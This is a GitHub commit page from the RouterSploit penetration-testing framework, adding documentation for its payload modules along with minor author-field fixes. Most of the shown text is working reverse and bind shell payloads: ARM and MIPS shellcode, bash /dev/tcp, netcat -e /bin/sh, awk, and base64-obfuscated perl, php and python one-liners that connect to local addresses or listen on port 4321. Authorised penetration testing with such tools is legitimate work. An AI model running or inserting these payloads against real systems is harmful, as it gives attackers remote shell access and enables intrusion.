Skip to content

R
routersploit
Unverified Commit 759d0630 by Marcin Bury Committed by GitHub
Options

Adding tests, docs for payloads (#462) 

* Adding tests,docs for payloads

* Fixing AWK Bind UDP payload
parent d2030a7d
Showing with 1268 additions and 35 deletions
docs/modules/payloads/armle/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell for ARMLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/armle/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates armle bind shell tcp payload
## Scenarios
```
rsf > use payloads/armle/bind_tcp
rsf (ARMLE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (ARMLE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d"
"\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0"
"\x8d\xe2\x00\x60\xa0\xe1\xe1\x10\xa0\xe3\x10\x70\xa0\xe3\x01"
"\x1c\xa0\xe1\x07\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0"
"\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x07\x00\x2d"
"\xe9\x02\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0"
"\x8d\xe2\x06\x00\xa0\xe1\x03\x00\x2d\xe9\x04\x00\xa0\xe3\x0d"
"\x10\xa0\xe1\x66\x00\x90\xef\x08\xd0\x8d\xe2\x06\x00\xa0\xe1"
"\x01\x10\x41\xe0\x02\x20\x42\xe0\x07\x00\x2d\xe9\x05\x00\xa0"
"\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60"
"\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x00\x90\xef\x01"
"\x10\x51\xe2\xfb\xff\xff\x5a\x04\x10\x4d\xe2\x02\x20\x42\xe0"
"\x2f\x30\xa0\xe3\x62\x70\xa0\xe3\x07\x34\x83\xe0\x69\x70\xa0"
"\xe3\x07\x38\x83\xe0\x6e\x70\xa0\xe3\x07\x3c\x83\xe0\x2f\x40"
"\xa0\xe3\x73\x70\xa0\xe3\x07\x44\x84\xe0\x68\x70\xa0\xe3\x07"
"\x48\x84\xe0\x73\x50\xa0\xe3\x68\x70\xa0\xe3\x07\x54\x85\xe0"
"\x3e\x00\x2d\xe9\x08\x00\x8d\xe2\x00\x10\x8d\xe2\x04\x20\x8d"
"\xe2\x0b\x00\x90\xef"
)
```
docs/modules/payloads/armle/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell for ARMLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/armle/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Module generates armle reverse shell tcp payload
## Scenarios
```
rsf >
rsf > use payloads/armle/reverse_tcp
rsf (ARMLE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (ARMLE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (ARMLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x01\x10\x8f\xe2\x11\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\x0f"
"\x02\x19\x37\x01\xdf\x06\x1c\x08\xa1\x10\x22\x02\x37\x01\xdf"
"\x3f\x27\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5\x05\xa0\x92"
"\x1a\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\x00\x10\xe1"
"\xc0\xa8\x01\x04\x2f\x62\x69\x6e\x2f\x73\x68\x00"
)
```
docs/modules/payloads/cmd/awk_bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using awk one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/awk_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates awk tcp bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/awk_bind_tcp
rsf (Awk Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Awk Bind TCP) > run
[*] Running module...
[*] Generating payload
awk 'BEGIN{s="/inet/tcp/4321/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
```
docs/modules/payloads/cmd/awk_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using awk one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/awk_reverse_tcp`
3. Do: `set lhost 192.168.1.3`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates awk tcp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/awk_reverse_tcp
rsf (Awk Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Awk Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Awk Reverse TCP) > run
[*] Running module...
[*] Generating payload
awk 'BEGIN{s="/inet/tcp/0/192.168.1.4/4321";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'
```
docs/modules/payloads/cmd/bash_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using bash one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/bash_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates bash tcp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/bash_reverse_tcp
rsf (Bash Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Bash Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Bash Reverse TCP) > run
[*] Running module...
[*] Generating payload
bash -i >& /dev/tcp/192.168.1.4/4321 0>&1
```
docs/modules/payloads/cmd/netcat_bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using netcat one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/netcat_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates netcat tcp bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/netcat_bind_tcp
rsf (Netcat Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Netcat Bind TCP) > run
[*] Running module...
[*] Generating payload
nc -lvp 4321 -e /bin/sh
```
docs/modules/payloads/cmd/netcat_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using netcat one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/netcat_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates netcat tcp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/netcat_reverse_tcp
rsf (Netcat Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Netcat Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Netcat Reverse TCP) > run
[*] Running module...
[*] Generating payload
nc 192.168.1.4 4321 -e /bin/sh
```
docs/modules/payloads/cmd/perl_bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using perl one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/perl_bind_udp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates perl tcp bind shell payload.
## Scenarios
```
rsf > use payloads/cmd/perl_bind_tcp
rsf (Perl Bind TCP One-Liner) > set rport 4321
[+] rport => 4321
rsf (Perl Bind TCP One-Liner) > run
[*] Running module...
[*] Generating payload
perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
```
docs/modules/payloads/cmd/perl_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using perl one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/perl_reverse_tcp`
3. Do: `set lhost 192.168.1.3`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates perl tcp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/perl_reverse_tcp
rsf (Perl Reverse TCP One-Liner) > set lhost 192.168.1.3
[+] lhost => 192.168.1.3
rsf (Perl Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Perl Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
perl -MIO -e "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
```
docs/modules/payloads/cmd/php_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using php one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/php_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates php tcp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/php_reverse_tcp
rsf (PHP Reverse TCP One-Liner) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (PHP Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (PHP Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
php -r "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
```
docs/modules/payloads/cmd/python_bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using python one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/python_bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates python tcp bind shell payload
## Scenarios
```
rsf > use payloads/cmd/python_bind_tcp
rsf (Python Reverse TCP One-Liner) > set rport 4321
[+] rport => 4321
rsf (Python Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
python -c "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
```
docs/modules/payloads/cmd/python_reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using python one-liner.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/cmd/python_reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Do: `run`
6. Module generates python udp reverse shell payload
## Scenarios
```
rsf > use payloads/cmd/python_reverse_tcp
rsf (Python Reverse TCP One-Liner) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Python Reverse TCP One-Liner) > set lport 4321
[+] lport => 4321
rsf (Python Reverse TCP One-Liner) > run
[*] Running module...
[*] Generating payload
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
```
docs/modules/payloads/mipsbe/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell for MIPSBE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsbe/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates mipsbe bind shell tcp payload
## Scenarios
```
rsf > use payloads/mipsbe/bind_tcp
rsf (MIPSBE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (MIPSBE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28"
"\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x30\x50"
"\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\xff\xfd\x01"
"\xa0\x68\x27\x01\xcd\x68\x04\x24\x0e\x10\xe1\x01\xae\x68\x25"
"\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff"
"\xec\x02\x10\x20\x25\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5"
"\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x02\x10\x20\x25\x24"
"\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x02\x10\x20\x25"
"\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01"
"\x0c\xaf\xa2\xff\xff\x24\x11\xff\xfd\x02\x20\x88\x27\x8f\xa4"
"\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24"
"\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff"
"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e"
"\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4"
"\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24"
"\x02\x0f\xab\x01\x01\x01\x0c"
)
```
docs/modules/payloads/mipsbe/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell for MIPSBE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsbe/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Module generates mipsbe reverse shell tcp payload
## Scenarios
```
rsf > use payloads/mipsbe/reverse_tcp
rsf (MIPSBE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (MIPSBE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (MIPSBE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\x28\x04\xff\xff\x24\x02\x0f\xa6\x01\x09\x09\x0c\x28\x04\x11"
"\x11\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01\x80"
"\x20\x27\x24\x02\x0f\xa6\x01\x09\x09\x0c\x24\x0c\xff\xfd\x01"
"\x80\x20\x27\x01\x80\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57"
"\x01\x09\x09\x0c\x30\x44\xff\xff\x24\x02\x0f\xc9\x01\x09\x09"
"\x0c\x24\x02\x0f\xc9\x01\x09\x09\x0c\x3c\x05\x00\x02\x34\xa5"
"\x10\xe1\xaf\xa5\xff\xf8\x3c\x05\xc0\xa8\x34\xa5\x01\x04\xaf"
"\xa5\xff\xfc\x23\xa5\xff\xf8\x24\x0c\xff\xef\x01\x80\x30\x27"
"\x24\x02\x10\x4a\x01\x09\x09\x0c\x3c\x08\x2f\x2f\x35\x08\x62"
"\x69\xaf\xa8\xff\xec\x3c\x08\x6e\x2f\x35\x08\x73\x68\xaf\xa8"
"\xff\xf0\x28\x07\xff\xff\xaf\xa7\xff\xf4\xaf\xa7\xff\xfc\x23"
"\xa4\xff\xec\x23\xa8\xff\xec\xaf\xa8\xff\xf8\x23\xa5\xff\xf8"
"\x27\xbd\xff\xec\x28\x06\xff\xff\x24\x02\x0f\xab\x00\x90\x93"
"\x4c"
)
```
docs/modules/payloads/mipsle/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell for MIPSLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsle/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates mipsle bind shell tcp payload
## Scenarios
```
rsf > use payloads/mipsle/bind_tcp
rsf (MIPSLE Bind TCP) > set rport 4321
[+] rport => 4321
rsf (MIPSLE Bind TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01\x27\x28\xc0"
"\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01\xff\xff"
"\x50\x30\xef\xff\x0e\x24\x27\x70\xc0\x01\x10\xe1\x0d\x24\x04"
"\x68\xcd\x01\xfd\xff\x0e\x24\x27\x70\xc0\x01\x25\x68\xae\x01"
"\xe0\xff\xad\xaf\xe4\xff\xa0\xaf\xe8\xff\xa0\xaf\xec\xff\xa0"
"\xaf\x25\x20\x10\x02\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff"
"\xa5\x23\x49\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02\x01"
"\x01\x05\x24\x4e\x10\x02\x24\x0c\x01\x01\x01\x25\x20\x10\x02"
"\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24\x0c\x01\x01"
"\x01\xff\xff\xa2\xaf\xfd\xff\x11\x24\x27\x88\x20\x02\xff\xff"
"\xa4\x8f\x21\x28\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff"
"\xff\x10\x24\xff\xff\x31\x22\xfa\xff\x30\x16\xff\xff\x06\x28"
"\x62\x69\x0f\x3c\x2f\x2f\xef\x35\xec\xff\xaf\xaf\x73\x68\x0e"
"\x3c\x6e\x2f\xce\x35\xf0\xff\xae\xaf\xf4\xff\xa0\xaf\xec\xff"
"\xa4\x27\xf8\xff\xa4\xaf\xfc\xff\xa0\xaf\xf8\xff\xa5\x27\xab"
"\x0f\x02\x24\x0c\x01\x01\x01"
)
```
docs/modules/payloads/mipsle/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell for MIPSLE architecture.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/mipsle/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
4. Do: `set lport 4321`
5. Module generates mipsle reverse shell tcp payload
## Scenarios
```
rsf > use payloads/mipsle/reverse_tcp
rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (MIPSLE Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (MIPSLE Reverse TCP) > run
[*] Running module...
[*] Generating payload
[+] Building payload for python
payload = (
"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04"
"\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20"
"\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27"
"\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24"
"\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09"
"\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00"
"\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc"
"\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01"
"\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08"
"\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff"
"\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec"
"\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23"
"\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09"
"\x01"
)
```
docs/modules/payloads/perl/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using perl.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/perl/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates perl tcp bind shell payload
## Scenarios
```
rsf > use payloads/perl/bind_tcp
rsf (Perl Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Perl Bind TCP) > run
[*] Running module...
[*] Generating payload
use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));
```
docs/modules/payloads/perl/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using perl.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/perl/reverse_tcp`
3. Do: `set lhost 192.168.1.3`
3. Do: `set lport 4321`
4. Do: `run`
5. Module generates perl tcp reverse shell payload
## Scenarios
```
rsf > use payloads/perl/reverse_tcp
rsf (Perl Reverse TCP) > set lhost 192.168.1.3
[+] lhost => 192.168.1.3
rsf (Perl Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Perl Reverse TCP) > run
[*] Running module...
[*] Generating payload
use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuMzo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='))
```
docs/modules/payloads/php/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using php.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/php/reverse_udp`
3. Do: `set lhost 192.168.1.4`
3. Do: `set lport 4321`
4. Do: `run`
5. Module generates php tcp reverse shell payload
## Scenarios
```
rsf > use payloads/php/reverse_tcp
rsf (PHP Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (PHP Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (PHP Reverse TCP) > run
[*] Running module...
[*] Generating payload
eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));
```
docs/modules/payloads/python/bind_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp bind shell by using python.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/python/bind_tcp`
3. Do: `set rport 4321`
4. Do: `run`
5. Module generates python tcp bind shell payload
## Scenarios
```
rsf > use payloads/python/bind_tcp
rsf (Python Bind TCP) > set rport 4321
[+] rport => 4321
rsf (Python Bind TCP) > run
[*] Running module...
[*] Generating payload
exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))
```
docs/modules/payloads/python/reverse_tcp.md 0 → 100644
## Description
Module generates payload that creates interactive tcp reverse shell by using python.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use payloads/python/reverse_tcp`
3. Do: `set lhost 192.168.1.4`
3. Do: `set lport 4321`
4. Do: `run`
5. Module generates python tcp reverse shell payload
## Scenarios
```
rsf > use payloads/python/reverse_tcp
rsf (Python Reverse TCP) > set lhost 192.168.1.4
[+] lhost => 192.168.1.4
rsf (Python Reverse TCP) > set lport 4321
[+] lport => 4321
rsf (Python Reverse TCP) > run
[*] Running module...
[*] Generating payload
exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))
```
routersploit/modules/payloads/armle/bind_tcp.py
......@@ -11,7 +11,7 @@ class Exploit(BindTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "ARMLE Bind TCP",
"description": "Creates interactive tcp bind shell for ARMLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/armle/reverse_tcp.py
......@@ -11,7 +11,7 @@ class Exploit(ReverseTCPPayloadMixin, ArchitectureSpecificPayload):
"name": "ARMLE Reverse TCP",
"description": "Creates interactive tcp reverse shell for ARMLE architecture.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/awk_bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Awk Bind TCP",
"description": "Creates an interactive tcp bind shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/awk_bind_udp.py
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Awk Bind UDP",
"description": "Creates an interactive udp bind shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/awk_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Awk Reverse TCP",
"description": "Creates an interactive tcp reverse shell by using (g)awk.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/bash_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
"name": "Bash Reverse TCP",
"description": "Creates interactive tcp reverse shell by using bash.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/netcat_bind_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(BindTCPPayloadMixin, GenericPayload):
"name": "Netcat Bind TCP",
"description": "Creates interactive tcp bind shell by using netcat.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>" # routersploit module
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
}
......
routersploit/modules/payloads/cmd/netcat_reverse_tcp.py
......@@ -7,7 +7,7 @@ class Exploit(ReverseTCPPayloadMixin, GenericPayload):
